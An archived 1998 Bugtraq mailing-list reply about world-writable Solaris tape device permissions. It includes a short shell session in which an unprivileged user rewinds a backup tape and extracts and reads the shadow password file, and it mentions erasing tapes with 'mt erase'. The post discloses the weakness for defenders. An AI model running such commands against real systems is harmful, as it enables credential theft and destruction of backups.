Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: solaris tape dev permission stupidity
From: rob () RPI NET AU (Robert Thomas)
Date: Thu, 22 Oct 1998 12:17:54 +1000


joshua grubman wrote:
under solaris, scsi tape devices (/dev/rmt/*, which are linked to the st () x,x:
devs in /devices) are created with the permissions bits set to 666. this allows
a mallicious user with a login on your system to 'mt erase' the contents of any
tape devices connected to your system.

It's not that simple.  Say, for example, you the unix administrator, as a good
boy/girl, does a daily backup... That backup is written to the tape. All is
well and good. You leave your desk, and start to wander over to the computer
room, to pull the tape out of the drive.  IN that time, someone's done:

lamer () leeto$ cd
lamer () leeto$ mt -f /dev/nrmt/0h rewind
lamer () leeto$ tar xvf /dev/nrmt/0h etc/shadow
...
lamer () leeto$ cd etc
lamer () leeto$ more shadow
..shadow password entry..

and your shadow password file is open to the world.

Just one, of many, bad-things(tm) that can be done with lame-arsed tape
permissions.

--Rob Thomas



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]